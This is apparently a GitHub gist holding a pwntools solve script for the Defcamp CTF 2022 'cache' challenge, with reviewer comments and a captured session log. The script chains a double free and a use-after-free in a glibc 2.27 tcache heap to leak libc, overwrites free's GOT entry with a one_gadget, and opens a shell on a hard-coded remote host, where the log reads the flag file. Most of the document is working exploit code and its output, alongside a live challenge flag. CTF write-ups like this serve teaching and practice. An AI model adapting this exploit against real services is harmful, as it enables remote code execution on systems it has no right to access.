
@soez
Last active February 14, 2022 09:25
Defcamp-CTF-2022_cache
from pwn import *
# Target selector read when `io` is created: True starts ./vuln as a local
# process, False connects to the remote service.
local = False

# Parse the libc and the target binary from the working directory so symbol
# and GOT addresses can be looked up by name; checksec output is suppressed.
libc = ELF("./libc.so.6", checksec=False)
binary = ELF("./vuln", checksec=False)
def menu(n):
    """Wait for the service's menu prompt, then submit option number *n*.

    Uses the module-level tube `io`, which is created further down the file.
    """
    io.recvuntil("\nChoice: ")
    choice = str(n)
    io.sendline(choice)
def cache_new_admin():
    """Select menu option 1 (called "new admin" by this script)."""
    menu(n=1)
def cache_new_user(s):
    """Select menu option 2 and answer the name prompt with *s*.

    sendline() appends a newline, so even an empty *s* sends one byte.
    """
    name_prompt = "What is your name: "
    menu(2)
    io.recvuntil(name_prompt)
    io.sendline(s)
def cache_print_admin():
    """Select menu option 3 (called "print admin" by this script)."""
    menu(n=3)
def cache_edit_user(s):
    """Select menu option 4 and answer the name prompt with *s*.

    Same prompt/response exchange as cache_new_user, but through the
    "edit" menu entry.
    """
    name_prompt = "What is your name: "
    menu(4)
    io.recvuntil(name_prompt)
    io.sendline(s)
def cache_print_user():
    """Select menu option 5 and return the data printed as the user's name.

    Skips output up to and including "Students name is " and returns the
    result of a 6-byte recv() after it; the caller decodes those bytes as
    a pointer.
    """
    menu(5)
    io.recvuntil("Students name is ")
    name_bytes = io.recv(6)
    return name_bytes
def cache_delete_admin():
    """Select menu option 6 (called "delete admin" by this script)."""
    menu(n=6)
def cache_delete_user():
    """Select menu option 7 (called "delete user" by this script)."""
    menu(n=7)
# CTF solve script, top-level sequence. Statement order is the whole point of
# the sequence, so it is documented in place rather than restructured.
#
# NOTE(review), defensive reading: the steps below only work if the service
# (1) lets the same user record be deleted twice, (2) still accepts "edit"
# on a deleted record, and (3) has a writable GOT. The usual fixes are to
# clear the record pointer on delete and reject operations on a null record,
# and to link with Full RELRO so the GOT is read-only. The transcript's
# directory listing shows ld-2.27.so; glibc 2.27's tcache has no double-free
# check (one was added in 2.29) -- presumably why the second delete is not
# aborted by the allocator.
#
# NOTE(review): the script assumes Python 2 str semantics (str arguments to
# sendline, a str pad character passed to ljust on received data).

# Open the tube: a local ./vuln process when `local` is set, otherwise the
# hard-coded remote CTF endpoint.
io = process(binary.path) if local else remote("34.159.7.96", 32552)
# Create one user record, then delete it twice in a row (double free).
cache_new_user("")
cache_delete_user()
cache_delete_user()
# Edit the already-deleted record (use-after-free write) with the GOT address
# of free. Presumably the name is stored at the start of the freed chunk,
# where the allocator keeps its free-list link -- TODO confirm against vuln.c.
cache_edit_user(p64(binary.got['free']))
# Two further allocations; presumably the second is handed out at the GOT
# slot instead of on the heap, making the "user record" alias free's entry.
cache_new_user("")
cache_new_user("")
# Read the record's "name" back: 6 bytes, zero-padded to 8 and decoded as a
# little-endian pointer. Subtracting 0x9790a yields the libc load base; the
# constant is specific to the supplied libc.so.6. Its low byte 0x0a matches
# the newline sent by cache_new_user("") -- presumably that newline replaced
# the low byte of the stored pointer; verify against the libc symbol table.
libc.address = u64(cache_print_user().ljust(8, '\0')) - 0x9790a
puts = libc.sym['puts']
# Offset into the supplied libc that the author labels "one_gadget".
one_gadget = libc.address + 0x10a38c
log.success("base libc 0x%08x" % libc.address)
log.success("one_gadget 0x%08x" % one_gadget)
# Write two consecutive 8-byte values through the aliased record: one_gadget
# first, then the resolved address of puts. Presumably the second value
# restores the GOT entry that follows free's -- TODO confirm GOT layout.
cache_edit_user(p64(one_gadget) + p64(puts))
# Trigger the delete path once more; presumably it calls free through the
# GOT entry that was just rewritten.
cache_delete_user()
# Hand the tube over to the terminal.
io.interactive()
'''
[+] Opening connection to 34.159.7.96 on port 32552: Done
[+] base libc 0x7f98fd152000
[+] one_gadget 0x7f98fd25c38c
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=3000 groups=3000,2000
$ ls
flag.txt ld-2.27.so libc.so.6 real_flag.txt vuln vuln.c
$ cat real_flag.txt
CTF{ab7bdaa3e5ed17ed326fef624a2d95d6ea62caa3dba6d1e5493936c362eed40e}
'''